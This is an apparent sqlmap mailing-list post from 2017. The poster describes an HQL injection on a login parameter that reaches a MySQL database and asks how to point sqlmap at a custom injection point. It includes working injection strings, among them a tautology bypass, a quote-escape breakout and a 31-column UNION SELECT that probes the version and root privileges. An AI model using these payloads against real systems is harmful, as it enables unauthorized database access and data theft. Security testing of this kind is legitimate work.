[sqlmap-users] injecting into MySQL through HQL
Brought to you by:
inquisb
From: Robin W. <ro...@di...> - 2017-02-24 22:12:45
|
I've just found an instance of Hibernate Query Language injection that lets me get at an underlying MySQL database if I inject in the right way, some examples I've got are: loginName=a - works and gives 200 loginName=' - fails with HQL error and 500 loginName=a' or 'a'='a - works and gives 200 loginName=a\'' - gets through HQL and then generates a MySQL error in a where clause. The injection gets converted to where NAME='a\''' With some playing I've found that this is a valid injection and they are running as root as I get a 500 back when I supply root, a 200 when give something else. loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01" from users where user()="root@localhost" -- '='1 The 500 is because some of the stuff from the union isn't being handled correctly by the page, the 200 is because the union doesn't return any data so the first bit (basically a=a) is returning valid data so getting through the rest of the parsing. So I think what I need to do is to tell SQLMap that it is a union injection with 31 fields and that the injection needs to go into here: loginName=a' and 'a\''="a" <INJECT> -- '='1 Can I do this? I've got all this set up and running in Burp so I can test things out if anyone needs me to. Robin |